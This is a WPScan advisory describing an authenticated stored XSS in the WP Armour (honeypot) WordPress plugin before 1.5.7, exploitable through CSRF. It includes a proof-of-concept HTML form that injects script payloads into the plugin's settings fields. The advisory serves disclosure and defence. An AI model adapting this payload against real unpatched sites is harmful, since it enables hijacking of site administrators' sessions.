WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Amour < 1.5.7 - Authenticated Stored Cross-Site Scripting (XSS)

Description

The plugin did not sanitise and escape its setting fields, leading to Stored Cross-Site Scripting issues. Furthermore, the lack of CSRF checks could also allow attackers to trigger the XSS via CSRF attacks against a logged in administrator

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wp-armour" method="POST">
      <input type="hidden" name="wpa_field_name" value='"><script>alert(/XSS-Field/)</script>' />
      <input type="hidden" name="wpa_error_message" value='"><script>alert(/XSS-Error/)</script>' />
      <input type="hidden" name="submit-wpa-general-settings" value="Save General Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

honeypot
Fixed in version 1.5.7

References

URL
https://plugins.trac.wordpress.org/changeset?new=2463499%40honeypot&old=2448055%40honeypot

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Verified

Yes

WPVDB ID
fe403a7f-99ed-4cb3-9000-1d1f3cc98f1a

Timeline

Publicly Published

2021-02-08 (about 1 years ago)

Added

2021-02-08 (about 1 years ago)

Last Updated

2021-02-08 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin